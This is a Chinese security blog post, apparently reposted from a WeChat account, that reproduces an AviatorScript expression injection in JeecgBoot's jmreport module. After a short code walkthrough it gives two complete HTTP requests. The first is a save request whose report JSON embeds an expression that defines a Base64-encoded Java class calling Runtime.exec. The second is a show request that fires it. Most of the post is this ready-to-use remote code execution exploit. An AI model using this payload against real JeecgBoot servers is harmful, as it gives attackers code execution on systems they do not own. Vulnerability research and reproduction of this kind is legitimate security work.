JeecgBoot AviatorScript表达式注入漏洞复现

admin 2024年8月8日13:52:22评论330 views字数 3936阅读13分7秒阅读模式

 

前言

最近有很多师傅也发了关于JeecgBoot AviatorScript表达式注入的部分或具体细节,我也来蹭一蹭,建议配合[代码审计]jeecg-boot最新权限绕过漏洞分析及新绕过发现 食用。

代码分析

可以简单过一下代码。

先去看/jeecg-boot/jmreport/save接口。

JeecgBoot AviatorScript表达式注入漏洞复现

进入saveReport处理。

JeecgBoot AviatorScript表达式注入漏洞复现

可以看到save接口主要就是对传入的json数据处理保存。表达式注入的触发点在show接口上。

JeecgBoot AviatorScript表达式注入漏洞复现

JeecgBoot AviatorScript表达式注入漏洞复现

跟进到ExpressUtil中,可以发现存在AviatorEvaluator。

JeecgBoot AviatorScript表达式注入漏洞复现

往下执行发现触发点。

JeecgBoot AviatorScript表达式注入漏洞复现

漏洞复现

POST /jeecg-boot/jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 HTTP/1.1Host: 192.168.37.1:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: application/json, text/plain, */*Content-Type: application/jsonContent-Length: 3456{    "loopBlockList": [],    "area": false,    "printElWidth": 718,    "excel_config_id": "980882669965455363",    "printElHeight": 1047,    "rows": {        "4": {            "cells": {                "4": {                    "text": "=(use org.springframework.cglib.core.*;use org.springframework.util.*;ReflectUtils.defineClass('test', Base64Utils.decodeFromString('yv66vgAAADQANgoACQAlCgAmACcIACgKACYAKQcAKgcAKwoABgAsBwAtBwAuAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMdGVzdDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcALwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAKgEAClNvdXJjZUZpbGUBAAl0ZXN0LmphdmEMAAoACwcAMAwAMQAyAQAEY2FsYwwAMwA0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uDAAKADUBAAR0ZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYAIQAIAAkAAAAAAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAJAA4AAAAMAAEAAAAFAA8AEAAAAAEAEQASAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAAWAA4AAAAgAAMAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAFQAWAAIAFwAAAAQAAQAYAAEAEQAZAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAAbAA4AAAAqAAQAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAGgAbAAIAAAABABwAHQADABcAAAAEAAEAGAAIAB4ACwABAAwAAABmAAMAAQAAABe4AAISA7YABFenAA1LuwAGWSq3AAe/sQABAAAACQAMAAUAAwANAAAAFgAFAAAADQAJABAADAAOAA0ADwAWABEADgAAAAwAAQANAAkAHwAgAAAAIQAAAAcAAkwHACIJAAEAIwAAAAIAJA=='), ClassLoader.getSystemClassLoader());)",                    "style": 0                }            },            "height": 25        },        "len": 96,        "-1": {            "cells": {                "-1": {                    "text": "${gongsi.id}"                }            },            "isDrag": true        }    },    "dbexps": [],    "toolPrintSizeObj": {        "printType": "A4",        "widthPx": 718,        "heightPx": 1047    },    "dicts": [],    "freeze": "A1",    "dataRectWidth": 701,    "background": false,    "name": "sheet1",    "autofilter": {},    "styles": [        {            "align": "center"        }    ],    "validations": [],    "cols": {        "4": {            "width": 95        },        "len": 50    },    "merges": [        "E4:F4",        "B4:B5",        "C4:C5",        "D4:D5",        "G4:G5",        "H4:H5",        "I4:I5",        "D1:G1",        "H3:I3"    ]}

JeecgBoot AviatorScript表达式注入漏洞复现

POST /jeecg-boot/jmreport/show?previousPage=xxx&jmLink=YWFhfHxiYmI= HTTP/1.1Host: 192.168.37.1:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: application/json, text/plain, */*Content-Type: application/jsonContent-Length: 42{    "id": "980882669965455363"}

JeecgBoot AviatorScript表达式注入漏洞复现

参考链接

https://github.com/jeecgboot/JeecgBoot/issues/7014

https://github.com/killme2008/aviatorscript/issues/421

https://whoopsunix.com/docs/java/Expression/Aviator/#jdk-%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84-aviator-%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5

 

 

原文始发于微信公众号(良月安全):[漏洞复现]JeecgBoot AviatorScript表达式注入漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月8日13:52:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JeecgBoot AviatorScript表达式注入漏洞复现https://cn-sec.com/archives/3045519.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息